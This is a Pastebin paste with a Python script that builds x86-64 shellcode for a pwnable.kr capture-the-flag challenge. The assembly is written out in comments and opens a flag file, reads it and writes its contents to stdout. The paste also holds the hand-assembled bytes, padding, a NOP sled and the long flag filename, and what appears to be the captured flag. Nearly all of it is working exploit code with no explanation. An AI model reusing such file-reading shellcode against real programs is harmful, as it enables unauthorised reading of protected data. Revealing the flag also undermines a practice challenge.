Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Mak1ng_shelLcodE_i5_veRy_eaSy
- # echo -ne $(python x.py) > test
- """
- mov rax,2
- mov rdi,1094795608
- mov rsi,0
- syscall
- mov rcx,rax
- mov rax,0
- mov rdi,rcx
- mov rsi,1094795407
- mov rdx,100
- syscall
- mov rax,1
- mov rdi,1
- mov rsi,1094795407
- mov rdx,100
- syscall
- mov rax,60
- mov rdi,2
- syscall
- nop
- nop
- nop
- nop
- """
- # https://defuse.ca/online-x86-assembler.htm#disassembly
- final_sc = r"\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x58\x41\x41\x41\x48\xC7\xC6\x00\x00\x00\x00\x0F\x05\x48\x89\xC1\x48\xC7\xC0\x00\x00\x00\x00\x48\x89\xCF\x48\xC7\xC6\x8F\x40\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x48\xC7\xC6\x8F\x40\x41\x41\x48\xC7\xC2\x64\x00\x00\x00\x0F\x05\x48\xC7\xC0\x3C\x00\x00\x00\x48\xC7\xC7\x02\x00\x00\x00\x0F\x05\x90\x90\x90\x90"
- buf = r'\x00'*100
- nop = r'\x90'*96
- name = r'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\x00'
- output = final_sc + buf + nop + name
- print(output)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement